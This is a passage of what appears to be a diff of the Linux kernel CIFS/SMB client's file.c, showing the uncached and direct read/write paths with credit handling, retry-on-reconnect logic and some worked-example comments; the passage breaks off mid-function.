++cifs_uncached_writev_complete(struct work_struct *work)
++{
++	struct cifs_writedata *wdata = container_of(work,
++					struct cifs_writedata, work);
++	struct inode *inode = d_inode(wdata->cfile->dentry);
++	struct cifsInodeInfo *cifsi = CIFS_I(inode);
++
++	spin_lock(&inode->i_lock);
++	cifs_update_eof(cifsi, wdata->offset, wdata->bytes);
++	if (cifsi->server_eof > inode->i_size)
++		i_size_write(inode, cifsi->server_eof);
++	spin_unlock(&inode->i_lock);
++
++	complete(&wdata->done);
++	collect_uncached_write_data(wdata->ctx);
++	/* the call below can possibly free the last ref to the aio ctx */
++	kref_put(&wdata->refcount, cifs_uncached_writedata_release);
++}
++
++static int
++wdata_fill_from_iovec(struct cifs_writedata *wdata, struct iov_iter *from,
++		      size_t *len, unsigned long *num_pages)
++{
++	size_t save_len, copied, bytes, cur_len = *len;
++	unsigned long i, nr_pages = *num_pages;
++
++	save_len = cur_len;
++	for (i = 0; i < nr_pages; i++) {
++		bytes = min_t(const size_t, cur_len, PAGE_SIZE);
++		copied = copy_page_from_iter(wdata->pages[i], 0, bytes, from);
++		cur_len -= copied;
++		/*
++		 * If we didn't copy as much as we expected, then that
++		 * may mean we trod into an unmapped area. Stop copying
++		 * at that point. On the next pass through the big
++		 * loop, we'll likely end up getting a zero-length
++		 * write and bailing out of it.
++		 */
++		if (copied < bytes)
++			break;
++	}
++	cur_len = save_len - cur_len;
++	*len = cur_len;
++
++	/*
++	 * If we have no data to send, then that probably means that
++	 * the copy above failed altogether. That's most likely because
++	 * the address in the iovec was bogus. Return -EFAULT and let
++	 * the caller free anything we allocated and bail out.
++	 */
++	if (!cur_len)
++		return -EFAULT;
++
++	/*
++	 * i + 1 now represents the number of pages we actually used in
++	 * the copy phase above.
++	 */
++	*num_pages = i + 1;
++	return 0;
++}
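++
++/*
++ * Illustrative example, assuming 4 KiB pages: with nr_pages = 4 and
++ * cur_len = 16384, a fault after 1000 bytes of the second page stops
++ * the loop with *len = 4096 + 1000 = 5096 and *num_pages = 2; if
++ * nothing at all could be copied, the function returns -EFAULT.
++ */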
++
++static int
++cifs_resend_wdata(struct cifs_writedata *wdata, struct list_head *wdata_list,
++	struct cifs_aio_ctx *ctx)
++{
++	unsigned int wsize;
++	struct cifs_credits credits;
++	int rc;
++	struct TCP_Server_Info *server = wdata->server;
++
++	do {
++		if (wdata->cfile->invalidHandle) {
++			rc = cifs_reopen_file(wdata->cfile, false);
++			if (rc == -EAGAIN)
++				continue;
++			else if (rc)
++				break;
++		}
++
++		/*
++		 * Wait for credits to resend this wdata.
++		 * Note: we are attempting to resend the whole wdata,
++		 * not in segments.
++		 */
++		do {
++			rc = server->ops->wait_mtu_credits(server, wdata->bytes,
++						&wsize, &credits);
++			if (rc)
++				goto fail;
++
++			if (wsize < wdata->bytes) {
++				add_credits_and_wake_if(server, &credits, 0);
++				msleep(1000);
++			}
++		} while (wsize < wdata->bytes);
++		wdata->credits = credits;
++
++		rc = adjust_credits(server, &wdata->credits, wdata->bytes);
++
++		if (!rc) {
++			if (wdata->cfile->invalidHandle)
++				rc = -EAGAIN;
++			else {
++#ifdef CONFIG_CIFS_SMB_DIRECT
++				if (wdata->mr) {
++					wdata->mr->need_invalidate = true;
++					smbd_deregister_mr(wdata->mr);
++					wdata->mr = NULL;
++				}
++#endif
++				rc = server->ops->async_writev(wdata,
++					cifs_uncached_writedata_release);
++			}
++		}
++
++		/* If the write was successfully sent, we are done */
++		if (!rc) {
++			list_add_tail(&wdata->list, wdata_list);
++			return 0;
++		}
++
++		/* Roll back credits and retry if needed */
++		add_credits_and_wake_if(server, &wdata->credits, 0);
++	} while (rc == -EAGAIN);
++
++fail:
++	kref_put(&wdata->refcount, cifs_uncached_writedata_release);
++	return rc;
++}
++
++static int
++cifs_write_from_iter(loff_t offset, size_t len, struct iov_iter *from,
++		     struct cifsFileInfo *open_file,
++		     struct cifs_sb_info *cifs_sb, struct list_head *wdata_list,
++		     struct cifs_aio_ctx *ctx)
++{
++	int rc = 0;
++	size_t cur_len;
++	unsigned long nr_pages, num_pages, i;
++	struct cifs_writedata *wdata;
++	struct iov_iter saved_from = *from;
++	loff_t saved_offset = offset;
++	pid_t pid;
++	struct TCP_Server_Info *server;
++	struct page **pagevec;
++	size_t start;
++	unsigned int xid;
++
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_RWPIDFORWARD)
++		pid = open_file->pid;
++	else
++		pid = current->tgid;
++
++	server = cifs_pick_channel(tlink_tcon(open_file->tlink)->ses);
++	xid = get_xid();
++
++	do {
++		unsigned int wsize;
++		struct cifs_credits credits_on_stack;
++		struct cifs_credits *credits = &credits_on_stack;
++
++		if (open_file->invalidHandle) {
++			rc = cifs_reopen_file(open_file, false);
++			if (rc == -EAGAIN)
++				continue;
++			else if (rc)
++				break;
++		}
++
++		rc = server->ops->wait_mtu_credits(server, cifs_sb->ctx->wsize,
++						   &wsize, credits);
++		if (rc)
++			break;
++
++		cur_len = min_t(const size_t, len, wsize);
++
++		if (ctx->direct_io) {
++			ssize_t result;
++
++			result = iov_iter_get_pages_alloc2(
++				from, &pagevec, cur_len, &start);
++			if (result < 0) {
++				cifs_dbg(VFS,
++					 "direct_writev couldn't get user pages (rc=%zd) iter type %d iov_offset %zd count %zd\n",
++					 result, iov_iter_type(from),
++					 from->iov_offset, from->count);
++				dump_stack();
++
++				rc = result;
++				add_credits_and_wake_if(server, credits, 0);
++				break;
++			}
++			cur_len = (size_t)result;
++
++			nr_pages =
++				(cur_len + start + PAGE_SIZE - 1) / PAGE_SIZE;
++
++			wdata = cifs_writedata_direct_alloc(pagevec,
++					     cifs_uncached_writev_complete);
++			if (!wdata) {
++				rc = -ENOMEM;
++				for (i = 0; i < nr_pages; i++)
++					put_page(pagevec[i]);
++				kvfree(pagevec);
++				add_credits_and_wake_if(server, credits, 0);
++				break;
++			}
++
++			wdata->page_offset = start;
++			wdata->tailsz =
++				nr_pages > 1 ?
++					cur_len - (PAGE_SIZE - start) -
++					(nr_pages - 2) * PAGE_SIZE :
++					cur_len;
++		} else {
++			nr_pages = get_numpages(wsize, len, &cur_len);
++			wdata = cifs_writedata_alloc(nr_pages,
++					     cifs_uncached_writev_complete);
++			if (!wdata) {
++				rc = -ENOMEM;
++				add_credits_and_wake_if(server, credits, 0);
++				break;
++			}
++
++			rc = cifs_write_allocate_pages(wdata->pages, nr_pages);
++			if (rc) {
++				kvfree(wdata->pages);
++				kfree(wdata);
++				add_credits_and_wake_if(server, credits, 0);
++				break;
++			}
++
++			num_pages = nr_pages;
++			rc = wdata_fill_from_iovec(
++				wdata, from, &cur_len, &num_pages);
++			if (rc) {
++				for (i = 0; i < nr_pages; i++)
++					put_page(wdata->pages[i]);
++				kvfree(wdata->pages);
++				kfree(wdata);
++				add_credits_and_wake_if(server, credits, 0);
++				break;
++			}
++
++			/*
++			 * Bring nr_pages down to the number of pages we
++			 * actually used, and free any pages that we didn't use.
++			 */
++			for ( ; nr_pages > num_pages; nr_pages--)
++				put_page(wdata->pages[nr_pages - 1]);
++
++			wdata->tailsz = cur_len - ((nr_pages - 1) * PAGE_SIZE);
++		}
++
++		wdata->sync_mode = WB_SYNC_ALL;
++		wdata->nr_pages = nr_pages;
++		wdata->offset = (__u64)offset;
++		wdata->cfile = cifsFileInfo_get(open_file);
++		wdata->server = server;
++		wdata->pid = pid;
++		wdata->bytes = cur_len;
++		wdata->pagesz = PAGE_SIZE;
++		wdata->credits = credits_on_stack;
++		wdata->ctx = ctx;
++		kref_get(&ctx->refcount);
++
++		rc = adjust_credits(server, &wdata->credits, wdata->bytes);
++
++		if (!rc) {
++			if (wdata->cfile->invalidHandle)
++				rc = -EAGAIN;
++			else
++				rc = server->ops->async_writev(wdata,
++					cifs_uncached_writedata_release);
++		}
++
++		if (rc) {
++			add_credits_and_wake_if(server, &wdata->credits, 0);
++			kref_put(&wdata->refcount,
++				 cifs_uncached_writedata_release);
++			if (rc == -EAGAIN) {
++				*from = saved_from;
++				iov_iter_advance(from, offset - saved_offset);
++				continue;
++			}
++			break;
++		}
++
++		list_add_tail(&wdata->list, wdata_list);
++		offset += cur_len;
++		len -= cur_len;
++	} while (len > 0);
++
++	free_xid(xid);
++	return rc;
++}
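++
++/*
++ * Note on the -EAGAIN path above: restoring *from to saved_from and
++ * advancing by (offset - saved_offset) rewinds the iterator to the
++ * start of the failed chunk. E.g. if three 64 KiB wdatas were already
++ * queued from saved_offset = 0, the iterator is re-advanced by 196608
++ * bytes and the fourth chunk is re-read from the source on retry.
++ */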
++
++static void collect_uncached_write_data(struct cifs_aio_ctx *ctx)
++{
++	struct cifs_writedata *wdata, *tmp;
++	struct cifs_tcon *tcon;
++	struct cifs_sb_info *cifs_sb;
++	struct dentry *dentry = ctx->cfile->dentry;
++	ssize_t rc;
++
++	tcon = tlink_tcon(ctx->cfile->tlink);
++	cifs_sb = CIFS_SB(dentry->d_sb);
++
++	mutex_lock(&ctx->aio_mutex);
++
++	if (list_empty(&ctx->list)) {
++		mutex_unlock(&ctx->aio_mutex);
++		return;
++	}
++
++	rc = ctx->rc;
++	/*
++	 * Wait for and collect replies for any successful sends in order of
++	 * increasing offset. Once an error is hit, then return without waiting
++	 * for any more replies.
++	 */
++restart_loop:
++	list_for_each_entry_safe(wdata, tmp, &ctx->list, list) {
++		if (!rc) {
++			if (!try_wait_for_completion(&wdata->done)) {
++				mutex_unlock(&ctx->aio_mutex);
++				return;
++			}
++
++			if (wdata->result)
++				rc = wdata->result;
++			else
++				ctx->total_len += wdata->bytes;
++
++			/* resend call if it's a retryable error */
++			if (rc == -EAGAIN) {
++				struct list_head tmp_list;
++				struct iov_iter tmp_from = ctx->iter;
++
++				INIT_LIST_HEAD(&tmp_list);
++				list_del_init(&wdata->list);
++
++				if (ctx->direct_io)
++					rc = cifs_resend_wdata(
++						wdata, &tmp_list, ctx);
++				else {
++					iov_iter_advance(&tmp_from,
++						 wdata->offset - ctx->pos);
++
++					rc = cifs_write_from_iter(wdata->offset,
++						wdata->bytes, &tmp_from,
++						ctx->cfile, cifs_sb, &tmp_list,
++						ctx);
++
++					kref_put(&wdata->refcount,
++						cifs_uncached_writedata_release);
++				}
++
++				list_splice(&tmp_list, &ctx->list);
++				goto restart_loop;
++			}
++		}
++		list_del_init(&wdata->list);
++		kref_put(&wdata->refcount, cifs_uncached_writedata_release);
++	}
++
++	cifs_stats_bytes_written(tcon, ctx->total_len);
++	set_bit(CIFS_INO_INVALID_MAPPING, &CIFS_I(dentry->d_inode)->flags);
++
++	ctx->rc = (rc == 0) ? ctx->total_len : rc;
++
++	mutex_unlock(&ctx->aio_mutex);
++
++	if (ctx->iocb && ctx->iocb->ki_complete)
++		ctx->iocb->ki_complete(ctx->iocb, ctx->rc);
++	else
++		complete(&ctx->done);
++}
++
++static ssize_t __cifs_writev(
++	struct kiocb *iocb, struct iov_iter *from, bool direct)
++{
++	struct file *file = iocb->ki_filp;
++	ssize_t total_written = 0;
++	struct cifsFileInfo *cfile;
++	struct cifs_tcon *tcon;
++	struct cifs_sb_info *cifs_sb;
++	struct cifs_aio_ctx *ctx;
++	struct iov_iter saved_from = *from;
++	size_t len = iov_iter_count(from);
++	int rc;
++
++	/*
++	 * iov_iter_get_pages_alloc doesn't work with ITER_KVEC.
++	 * In this case, fall back to the non-direct write function.
++	 * This could be improved by getting pages directly in ITER_KVEC.
++	 */
++	if (direct && iov_iter_is_kvec(from)) {
++		cifs_dbg(FYI, "use non-direct cifs_writev for kvec I/O\n");
++		direct = false;
++	}
++
++	rc = generic_write_checks(iocb, from);
++	if (rc <= 0)
++		return rc;
++
++	cifs_sb = CIFS_FILE_SB(file);
++	cfile = file->private_data;
++	tcon = tlink_tcon(cfile->tlink);
++
++	if (!tcon->ses->server->ops->async_writev)
++		return -ENOSYS;
++
++	ctx = cifs_aio_ctx_alloc();
++	if (!ctx)
++		return -ENOMEM;
++
++	ctx->cfile = cifsFileInfo_get(cfile);
++
++	if (!is_sync_kiocb(iocb))
++		ctx->iocb = iocb;
++
++	ctx->pos = iocb->ki_pos;
++
++	if (direct) {
++		ctx->direct_io = true;
++		ctx->iter = *from;
++		ctx->len = len;
++	} else {
++		rc = setup_aio_ctx_iter(ctx, from, ITER_SOURCE);
++		if (rc) {
++			kref_put(&ctx->refcount, cifs_aio_ctx_release);
++			return rc;
++		}
++	}
++
++	/* grab a lock here because response handlers can access ctx */
++	mutex_lock(&ctx->aio_mutex);
++
++	rc = cifs_write_from_iter(iocb->ki_pos, ctx->len, &saved_from,
++				  cfile, cifs_sb, &ctx->list, ctx);
++
++	/*
++	 * If at least one write was successfully sent, then discard any rc
++	 * value from the later writes. If the remaining writes succeed, then
++	 * we'll end up returning whatever was written. If they fail, then
++	 * we'll get a new rc value from that.
++	 */
++	if (!list_empty(&ctx->list))
++		rc = 0;
++
++	mutex_unlock(&ctx->aio_mutex);
++
++	if (rc) {
++		kref_put(&ctx->refcount, cifs_aio_ctx_release);
++		return rc;
++	}
++
++	if (!is_sync_kiocb(iocb)) {
++		kref_put(&ctx->refcount, cifs_aio_ctx_release);
++		return -EIOCBQUEUED;
++	}
++
++	rc = wait_for_completion_killable(&ctx->done);
++	if (rc) {
++		mutex_lock(&ctx->aio_mutex);
++		ctx->rc = rc = -EINTR;
++		total_written = ctx->total_len;
++		mutex_unlock(&ctx->aio_mutex);
++	} else {
++		rc = ctx->rc;
++		total_written = ctx->total_len;
++	}
++
++	kref_put(&ctx->refcount, cifs_aio_ctx_release);
++
++	if (unlikely(!total_written))
++		return rc;
++
++	iocb->ki_pos += total_written;
++	return total_written;
++}
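++
++/*
++ * Illustrative flow, assuming wsize = 256 KiB: a 1 MiB write is split
++ * by cifs_write_from_iter() into four wdatas. A synchronous kiocb then
++ * blocks above until collect_uncached_write_data() has accumulated
++ * ctx->total_len, while an async kiocb returns -EIOCBQUEUED and
++ * completes later through ctx->iocb->ki_complete().
++ */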
++
++ssize_t cifs_direct_writev(struct kiocb *iocb, struct iov_iter *from)
++{
++	struct file *file = iocb->ki_filp;
++
++	cifs_revalidate_mapping(file->f_inode);
++	return __cifs_writev(iocb, from, true);
++}
++
++ssize_t cifs_user_writev(struct kiocb *iocb, struct iov_iter *from)
++{
++	return __cifs_writev(iocb, from, false);
++}
++
++static ssize_t
++cifs_writev(struct kiocb *iocb, struct iov_iter *from)
++{
++	struct file *file = iocb->ki_filp;
++	struct cifsFileInfo *cfile = (struct cifsFileInfo *)file->private_data;
++	struct inode *inode = file->f_mapping->host;
++	struct cifsInodeInfo *cinode = CIFS_I(inode);
++	struct TCP_Server_Info *server = tlink_tcon(cfile->tlink)->ses->server;
++	ssize_t rc;
++
++	inode_lock(inode);
++	/*
++	 * We need to hold the sem to be sure nobody modifies the lock list
++	 * with a brlock that prevents writing.
++	 */
++	down_read(&cinode->lock_sem);
++
++	rc = generic_write_checks(iocb, from);
++	if (rc <= 0)
++		goto out;
++
++	if (!cifs_find_lock_conflict(cfile, iocb->ki_pos, iov_iter_count(from),
++				     server->vals->exclusive_lock_type, 0,
++				     NULL, CIFS_WRITE_OP))
++		rc = __generic_file_write_iter(iocb, from);
++	else
++		rc = -EACCES;
++out:
++	up_read(&cinode->lock_sem);
++	inode_unlock(inode);
++
++	if (rc > 0)
++		rc = generic_write_sync(iocb, rc);
++	return rc;
++}
++
++ssize_t
++cifs_strict_writev(struct kiocb *iocb, struct iov_iter *from)
++{
++	struct inode *inode = file_inode(iocb->ki_filp);
++	struct cifsInodeInfo *cinode = CIFS_I(inode);
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct cifsFileInfo *cfile = (struct cifsFileInfo *)
++						iocb->ki_filp->private_data;
++	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
++	ssize_t written;
++
++	written = cifs_get_writer(cinode);
++	if (written)
++		return written;
++
++	if (CIFS_CACHE_WRITE(cinode)) {
++		if (cap_unix(tcon->ses) &&
++		(CIFS_UNIX_FCNTL_CAP & le64_to_cpu(tcon->fsUnixInfo.Capability))
++		  && ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOPOSIXBRL) == 0)) {
++			written = generic_file_write_iter(iocb, from);
++			goto out;
++		}
++		written = cifs_writev(iocb, from);
++		goto out;
++	}
++	/*
++	 * For non-oplocked files in strict cache mode we need to write the data
++	 * to the server exactly from pos to pos+len-1 rather than flush all
++	 * affected pages, because flushing may cause an error with mandatory
++	 * locks on these pages but not on the region from pos to pos+len-1.
++	 */
++	written = cifs_user_writev(iocb, from);
++	if (CIFS_CACHE_READ(cinode)) {
++		/*
++		 * We have read level caching and we have just sent a write
++		 * request to the server thus making data in the cache stale.
++		 * Zap the cache and set oplock/lease level to NONE to avoid
++		 * reading stale data from the cache. All subsequent read
++		 * operations will read new data from the server.
++		 */
++		cifs_zap_mapping(inode);
++		cifs_dbg(FYI, "Set Oplock/Lease to NONE for inode=%p after write\n",
++			 inode);
++		cinode->oplock = 0;
++	}
++out:
++	cifs_put_writer(cinode);
++	return written;
++}
++
++static struct cifs_readdata *
++cifs_readdata_direct_alloc(struct page **pages, work_func_t complete)
++{
++	struct cifs_readdata *rdata;
++
++	rdata = kzalloc(sizeof(*rdata), GFP_KERNEL);
++	if (rdata != NULL) {
++		rdata->pages = pages;
++		kref_init(&rdata->refcount);
++		INIT_LIST_HEAD(&rdata->list);
++		init_completion(&rdata->done);
++		INIT_WORK(&rdata->work, complete);
++	}
++
++	return rdata;
++}
++
++static struct cifs_readdata *
++cifs_readdata_alloc(unsigned int nr_pages, work_func_t complete)
++{
++	struct page **pages =
++		kcalloc(nr_pages, sizeof(struct page *), GFP_KERNEL);
++	struct cifs_readdata *ret = NULL;
++
++	if (pages) {
++		ret = cifs_readdata_direct_alloc(pages, complete);
++		if (!ret)
++			kfree(pages);
++	}
++
++	return ret;
++}
++
++void
++cifs_readdata_release(struct kref *refcount)
++{
++	struct cifs_readdata *rdata = container_of(refcount,
++					struct cifs_readdata, refcount);
++#ifdef CONFIG_CIFS_SMB_DIRECT
++	if (rdata->mr) {
++		smbd_deregister_mr(rdata->mr);
++		rdata->mr = NULL;
++	}
++#endif
++	if (rdata->cfile)
++		cifsFileInfo_put(rdata->cfile);
++
++	kvfree(rdata->pages);
++	kfree(rdata);
++}
++
++static int
++cifs_read_allocate_pages(struct cifs_readdata *rdata, unsigned int nr_pages)
++{
++	int rc = 0;
++	struct page *page;
++	unsigned int i;
++
++	for (i = 0; i < nr_pages; i++) {
++		page = alloc_page(GFP_KERNEL|__GFP_HIGHMEM);
++		if (!page) {
++			rc = -ENOMEM;
++			break;
++		}
++		rdata->pages[i] = page;
++	}
++
++	if (rc) {
++		unsigned int nr_page_failed = i;
++
++		for (i = 0; i < nr_page_failed; i++) {
++			put_page(rdata->pages[i]);
++			rdata->pages[i] = NULL;
++		}
++	}
++	return rc;
++}
++
++static void
++cifs_uncached_readdata_release(struct kref *refcount)
++{
++	struct cifs_readdata *rdata = container_of(refcount,
++					struct cifs_readdata, refcount);
++	unsigned int i;
++
++	kref_put(&rdata->ctx->refcount, cifs_aio_ctx_release);
++	for (i = 0; i < rdata->nr_pages; i++) {
++		put_page(rdata->pages[i]);
++	}
++	cifs_readdata_release(refcount);
++}
++
++/**
++ * cifs_readdata_to_iov - copy data from pages in response to an iovec
++ * @rdata:	the readdata response with list of pages holding data
++ * @iter:	destination for our data
++ *
++ * This function copies data from a list of pages in a readdata response into
++ * an array of iovecs. It will first calculate where the data should go
++ * based on the info in the readdata and then copy the data into that spot.
++ */
++static int
++cifs_readdata_to_iov(struct cifs_readdata *rdata, struct iov_iter *iter)
++{
++	size_t remaining = rdata->got_bytes;
++	unsigned int i;
++
++	for (i = 0; i < rdata->nr_pages; i++) {
++		struct page *page = rdata->pages[i];
++		size_t copy = min_t(size_t, remaining, PAGE_SIZE);
++		size_t written;
++
++		if (unlikely(iov_iter_is_pipe(iter))) {
++			void *addr = kmap_atomic(page);
++
++			written = copy_to_iter(addr, copy, iter);
++			kunmap_atomic(addr);
++		} else
++			written = copy_page_to_iter(page, 0, copy, iter);
++		remaining -= written;
++		if (written < copy && iov_iter_count(iter) > 0)
++			break;
++	}
++	return remaining ? -EFAULT : 0;
++}
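++
++/*
++ * Illustrative example, assuming 4 KiB pages: for got_bytes = 5000,
++ * 4096 bytes are copied out of pages[0] and 904 out of pages[1]; if
++ * the destination iovec faults before 'remaining' reaches zero, the
++ * function returns -EFAULT.
++ */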
++
++static void collect_uncached_read_data(struct cifs_aio_ctx *ctx);
++
++static void
++cifs_uncached_readv_complete(struct work_struct *work)
++{
++	struct cifs_readdata *rdata = container_of(work,
++						struct cifs_readdata, work);
++
++	complete(&rdata->done);
++	collect_uncached_read_data(rdata->ctx);
++	/* the call below can possibly free the last ref to the aio ctx */
++	kref_put(&rdata->refcount, cifs_uncached_readdata_release);
++}
++
++static int
++uncached_fill_pages(struct TCP_Server_Info *server,
++		    struct cifs_readdata *rdata, struct iov_iter *iter,
++		    unsigned int len)
++{
++	int result = 0;
++	unsigned int i;
++	unsigned int nr_pages = rdata->nr_pages;
++	unsigned int page_offset = rdata->page_offset;
++
++	rdata->got_bytes = 0;
++	rdata->tailsz = PAGE_SIZE;
++	for (i = 0; i < nr_pages; i++) {
++		struct page *page = rdata->pages[i];
++		size_t n;
++		unsigned int segment_size = rdata->pagesz;
++
++		if (i == 0)
++			segment_size -= page_offset;
++		else
++			page_offset = 0;
++
++		if (len <= 0) {
++			/* no need to hold page hostage */
++			rdata->pages[i] = NULL;
++			rdata->nr_pages--;
++			put_page(page);
++			continue;
++		}
++
++		n = len;
++		if (len >= segment_size)
++			/* enough data to fill the page */
++			n = segment_size;
++		else
++			rdata->tailsz = len;
++		len -= n;
++
++		if (iter)
++			result = copy_page_from_iter(
++					page, page_offset, n, iter);
++#ifdef CONFIG_CIFS_SMB_DIRECT
++		else if (rdata->mr)
++			result = n;
++#endif
++		else
++			result = cifs_read_page_from_socket(
++					server, page, page_offset, n);
++		if (result < 0)
++			break;
++
++		rdata->got_bytes += result;
++	}
++
++	return result != -ECONNABORTED && rdata->got_bytes > 0 ?
++						rdata->got_bytes : result;
++}
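++
++/*
++ * Illustrative example, assuming 4 KiB pages: with page_offset = 512,
++ * pagesz = 4096 and len = 6000, the first page receives
++ * 4096 - 512 = 3584 bytes, the second receives the remaining 2416
++ * (recorded as tailsz), and any further pages are released since len
++ * has dropped to zero.
++ */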
++
++static int
++cifs_uncached_read_into_pages(struct TCP_Server_Info *server,
++			      struct cifs_readdata *rdata, unsigned int len)
++{
++	return uncached_fill_pages(server, rdata, NULL, len);
++}
++
++static int
++cifs_uncached_copy_into_pages(struct TCP_Server_Info *server,
++			      struct cifs_readdata *rdata,
++			      struct iov_iter *iter)
++{
++	return uncached_fill_pages(server, rdata, iter, iter->count);
++}
++
++static int cifs_resend_rdata(struct cifs_readdata *rdata,
++			struct list_head *rdata_list,
++			struct cifs_aio_ctx *ctx)
++{
++	unsigned int rsize;
++	struct cifs_credits credits;
++	int rc;
++	struct TCP_Server_Info *server;
++
++	/* XXX: should we pick a new channel here? */
++	server = rdata->server;
++
++	do {
++		if (rdata->cfile->invalidHandle) {
++			rc = cifs_reopen_file(rdata->cfile, true);
++			if (rc == -EAGAIN)
++				continue;
++			else if (rc)
++				break;
++		}
++
++		/*
++		 * Wait for credits to resend this rdata.
++		 * Note: we are attempting to resend the whole rdata,
++		 * not in segments.
++		 */
++		do {
++			rc = server->ops->wait_mtu_credits(server, rdata->bytes,
++						&rsize, &credits);
++
++			if (rc)
++				goto fail;
++
++			if (rsize < rdata->bytes) {
++				add_credits_and_wake_if(server, &credits, 0);
++				msleep(1000);
++			}
++		} while (rsize < rdata->bytes);
++		rdata->credits = credits;
++
++		rc = adjust_credits(server, &rdata->credits, rdata->bytes);
++		if (!rc) {
++			if (rdata->cfile->invalidHandle)
++				rc = -EAGAIN;
++			else {
++#ifdef CONFIG_CIFS_SMB_DIRECT
++				if (rdata->mr) {
++					rdata->mr->need_invalidate = true;
++					smbd_deregister_mr(rdata->mr);
++					rdata->mr = NULL;
++				}
++#endif
++				rc = server->ops->async_readv(rdata);
++			}
++		}
++
++		/* If the read was successfully sent, we are done */
++		if (!rc) {
++			/* Add to aio pending list */
++			list_add_tail(&rdata->list, rdata_list);
++			return 0;
++		}
++
++		/* Roll back credits and retry if needed */
++		add_credits_and_wake_if(server, &rdata->credits, 0);
++	} while (rc == -EAGAIN);
++
++fail:
++	kref_put(&rdata->refcount, cifs_uncached_readdata_release);
++	return rc;
++}
++
++static int
++cifs_send_async_read(loff_t offset, size_t len, struct cifsFileInfo *open_file,
++		     struct cifs_sb_info *cifs_sb, struct list_head *rdata_list,
++		     struct cifs_aio_ctx *ctx)
++{
++	struct cifs_readdata *rdata;
++	unsigned int npages, rsize;
++	struct cifs_credits credits_on_stack;
++	struct cifs_credits *credits = &credits_on_stack;
++	size_t cur_len;
++	int rc;
++	pid_t pid;
++	struct TCP_Server_Info *server;
++	struct page **pagevec;
++	size_t start;
++	struct iov_iter direct_iov = ctx->iter;
++
++	server = cifs_pick_channel(tlink_tcon(open_file->tlink)->ses);
++
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_RWPIDFORWARD)
++		pid = open_file->pid;
++	else
++		pid = current->tgid;
++
++	if (ctx->direct_io)
++		iov_iter_advance(&direct_iov, offset - ctx->pos);
++
++	do {
++		if (open_file->invalidHandle) {
++			rc = cifs_reopen_file(open_file, true);
++			if (rc == -EAGAIN)
++				continue;
++			else if (rc)
++				break;
++		}
++
++		if (cifs_sb->ctx->rsize == 0)
++			cifs_sb->ctx->rsize =
++				server->ops->negotiate_rsize(tlink_tcon(open_file->tlink),
++							     cifs_sb->ctx);
++
++		rc = server->ops->wait_mtu_credits(server, cifs_sb->ctx->rsize,
++						   &rsize, credits);
++		if (rc)
++			break;
++
++		cur_len = min_t(const size_t, len, rsize);
++
++		if (ctx->direct_io) {
++			ssize_t result;
++
++			result = iov_iter_get_pages_alloc2(
++					&direct_iov, &pagevec,
++					cur_len, &start);
++			if (result < 0) {
++				cifs_dbg(VFS,
++					 "Couldn't get user pages (rc=%zd) iter type %d iov_offset %zd count %zd\n",
++					 result, iov_iter_type(&direct_iov),
++					 direct_iov.iov_offset,
++					 direct_iov.count);
++				dump_stack();
++
++				rc = result;
++				add_credits_and_wake_if(server, credits, 0);
++				break;
++			}
++			cur_len = (size_t)result;
++
++			rdata = cifs_readdata_direct_alloc(
++					pagevec, cifs_uncached_readv_complete);
++			if (!rdata) {
++				add_credits_and_wake_if(server, credits, 0);
++				rc = -ENOMEM;
++				break;
++			}
++
++			npages = (cur_len + start + PAGE_SIZE - 1) / PAGE_SIZE;
++			rdata->page_offset = start;
++			rdata->tailsz = npages > 1 ?
++				cur_len - (PAGE_SIZE - start) -
++				(npages - 2) * PAGE_SIZE :
++				cur_len;
++
++		} else {
++			npages = DIV_ROUND_UP(cur_len, PAGE_SIZE);
++			/* allocate a readdata struct */
++			rdata = cifs_readdata_alloc(npages,
++					    cifs_uncached_readv_complete);
++			if (!rdata) {
++				add_credits_and_wake_if(server, credits, 0);
++				rc = -ENOMEM;
++				break;
++			}
++
++			rc = cifs_read_allocate_pages(rdata, npages);
++			if (rc) {
++				kvfree(rdata->pages);
++				kfree(rdata);
++				add_credits_and_wake_if(server, credits, 0);
++				break;
++			}
++
++			rdata->tailsz = PAGE_SIZE;
++		}
++
++		rdata->server = server;
++		rdata->cfile = cifsFileInfo_get(open_file);
++		rdata->nr_pages = npages;
++		rdata->offset = offset;
++		rdata->bytes = cur_len;
++		rdata->pid = pid;
++		rdata->pagesz = PAGE_SIZE;
++		rdata->read_into_pages = cifs_uncached_read_into_pages;
++		rdata->copy_into_pages = cifs_uncached_copy_into_pages;
++		rdata->credits = credits_on_stack;
++		rdata->ctx = ctx;
++		kref_get(&ctx->refcount);
++
++		rc = adjust_credits(server, &rdata->credits, rdata->bytes);
++
++		if (!rc) {
++			if (rdata->cfile->invalidHandle)
++				rc = -EAGAIN;
++			else
++				rc = server->ops->async_readv(rdata);
++		}
++
++		if (rc) {
++			add_credits_and_wake_if(server, &rdata->credits, 0);
++			kref_put(&rdata->refcount,
++				cifs_uncached_readdata_release);
++			if (rc == -EAGAIN) {
++				iov_iter_revert(&direct_iov, cur_len);
++				continue;
++			}
++			break;
++		}
++
++		list_add_tail(&rdata->list, rdata_list);
++		offset += cur_len;
++		len -= cur_len;
++	} while (len > 0);
++
++	return rc;
++}
++
++static void
++collect_uncached_read_data(struct cifs_aio_ctx *ctx)
++{
++	struct cifs_readdata *rdata, *tmp;
++	struct iov_iter *to = &ctx->iter;
++	struct cifs_sb_info *cifs_sb;
++	int rc;
++
++	cifs_sb = CIFS_SB(ctx->cfile->dentry->d_sb);
++
++	mutex_lock(&ctx->aio_mutex);
++
++	if (list_empty(&ctx->list)) {
++		mutex_unlock(&ctx->aio_mutex);
++		return;
++	}
++
++	rc = ctx->rc;
++	/* the loop below should proceed in the order of increasing offsets */
++again:
++	list_for_each_entry_safe(rdata, tmp, &ctx->list, list) {
++		if (!rc) {
++			if (!try_wait_for_completion(&rdata->done)) {
++				mutex_unlock(&ctx->aio_mutex);
++				return;
++			}
++
++			if (rdata->result == -EAGAIN) {
++				/* resend call if it's a retryable error */
++				struct list_head tmp_list;
++				unsigned int got_bytes = rdata->got_bytes;
++
++				list_del_init(&rdata->list);
++				INIT_LIST_HEAD(&tmp_list);
++
++				/*
++				 * We got part of the data and then a
++				 * reconnect happened -- fill the buffer and
++				 * continue reading.
++				 */
++				if (got_bytes && got_bytes < rdata->bytes) {
++					rc = 0;
++					if (!ctx->direct_io)
++						rc = cifs_readdata_to_iov(rdata, to);
++					if (rc) {
